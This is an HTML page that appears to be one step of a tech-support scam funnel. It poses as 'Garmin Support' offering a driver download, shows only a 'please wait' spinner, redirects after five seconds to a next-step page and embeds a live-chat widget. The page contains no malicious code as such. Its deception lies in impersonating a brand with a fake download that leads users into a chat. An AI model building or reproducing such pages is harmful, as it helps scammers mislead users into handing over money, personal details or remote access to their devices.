<html>
    <head>
        <script src="https://cdn.tailwindcss.com"></script>
    </head>
    <body>
        <div class="flex justify-between items-center p-5 shadow-lg">
            <a href="/" class="text-3xl text-gray-600">Garmin Support</a>
            <img src="../images/car1.png" class="h-24" alt="" />
        </div>
        <div class="px-4 md:px-12 py-7">
            <div class="text-2xl">Download Garmin Setup/Drivers</div>
            <div class="h-96 w-full flex justify-center items-center flex-col">
                <img src="../images/loading.gif" />
                <div class="mt-[-100px]">please wait</div>
            </div>
        </div>
    </body>
</html>
<meta http-equiv="refresh" content="5; url = ./tep 4.html" />
<script type="text/javascript">
    var Tawk_API = Tawk_API || {},
        Tawk_LoadStart = new Date();
    (function () {
        var s1 = document.createElement("script"),
            s0 = document.getElementsByTagName("script")[0];
        s1.async = true;
        s1.src = "https://embed.tawk.to/63597446b0d6371309cbb56d/1ggamsdmj";
        s1.charset = "UTF-8";
        s1.setAttribute("crossorigin", "*");
        s0.parentNode.insertBefore(s1, s0);
    })();
</script>
